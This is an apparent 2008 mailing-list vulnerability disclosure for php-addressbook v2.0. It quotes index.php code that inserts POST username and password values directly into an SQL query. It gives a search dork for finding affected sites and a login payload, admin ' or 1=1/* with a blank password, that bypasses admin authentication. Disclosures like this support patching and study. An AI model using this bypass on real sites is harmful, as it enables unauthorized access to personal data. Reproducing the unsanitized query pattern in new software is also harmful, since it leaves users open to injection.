php-addressbook v2.0 SQL Injection Vulnerbility

hadihadi_zedehal_2006 Wed, 26 Mar 2008 08:21:20 -0700

             
########################################################################


             #                                                                  
    #

             #     php-addressbook v2.0 SQL Injection Vulnerbility              
    #

             #                [admin Authentication bypass]                     
    #

             
########################################################################


Virangar Security Team


www.virangar.org

www.virangar.net


--------

Discoverd By : hadihadi 


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all iranian hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----------------------------------

dork: © php-addressbook v2.0

-----------------------------------

vuln code in index.php:

line 26:$username = $_POST['username'];

ine 27:$password = $_POST['password'];

and line 28:

$sql = "SELECT * FROM $usertable WHERE username='$username' AND 
password=PASSWORD('$password')";


 -----------------------

vuln:

login:admin ' or 1=1/*

password:[blank]

-------------------------------------

tnx: all hackerz

php-addressbook v2.0 SQL Injection Vulnerbility

Reply via email to